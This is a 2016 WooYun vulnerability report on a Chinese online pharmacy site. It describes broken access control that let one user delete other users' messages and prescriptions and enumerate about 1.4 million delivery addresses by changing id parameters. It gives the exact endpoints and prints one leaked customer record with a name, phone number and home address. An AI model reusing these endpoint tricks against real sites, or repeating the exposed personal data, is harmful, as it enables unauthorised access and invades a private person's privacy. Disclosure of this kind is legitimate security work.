当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193632

漏洞标题:开心人大药房www主站多处漏洞打包(越权+敏感信息泄露)

相关厂商:开心人大药房

漏洞作者: goubuli

提交时间:2016-04-08 11:53

修复时间:2016-05-23 12:00

公开时间:2016-05-23 12:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

越权+敏感信息泄露等
越权+140w+收货人信息泄露

详细说明:

接前一个漏洞: WooYun: 开心人大药房www主站信息泄露(140w+用户名\邮箱\收货人姓名\电话\地址等)
主站地址:

http://www.360kxr.com/


====================================================================
漏洞一、越权删除他人消息
漏洞url:

http://www.360kxr.com/Private/DeleteMessage/?id=4006172-


参数id为消息id,变换其他人消息id即可删除,点击自己的消息,抓包:

删除消息-1.png


然后变化id

删除消息-2.png


另一个账户的消息被删除

删除消息-3.png


====================================================================
漏洞二、越权删除他人处方
漏洞url:

http://www.360kxr.com/Private/RecipeDelete/6879
POST:id=6879


参数id为处方id,变换id即可删除他人处方,抓包:

删除处方-1.png


删除处方-2.png


删除他人处方,另外一个账户的处方被删除

删除处方-4.png


另外一个账户处方已被删除

删除处方-5.png


====================================================================
漏洞三、遍历收货人地址信息(涉及140w收货地址信息)
漏洞url:

http://www.360kxr.com/PromptOrder/GetReceiverInfo/
POST:id=1436108


在下单处,可以选择收货人信息,直接遍历所有人收货人信息

遍历地址-3.png


抓包

遍历地址-1.png


包括:用户名、姓名、详细地址、电话等敏感信息

{"receive_id":1432508
"user_name":"何茈怡"
"create_user":"13917887210"
"province":"310000
上海市"
"city":"310100,市辖区"
"county":"310115,浦东新区"
"address":"含笑路36号"
"mobile":"13917887210"
"phone":""
"email":null
"zip_code":""
"create_date":"\/Date(1458447641120)\/"
"desciption":null
"isVisible":true
"is_default":0
"update_date":"\/Date(1458447641120)\/"
"EntityState":2
"EntityKey":{"EntitySetName":"receive_addr","EntityContainerName":"Entities"
"EntityKeyValues":[{"Key":"receive_id","Value":1432508}]
"IsTemporary":false}}


遍历地址-2.png

漏洞证明:

如上

修复方案:

加入token机制等,身份校验

版权声明:转载请注明来源 goubuli@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评价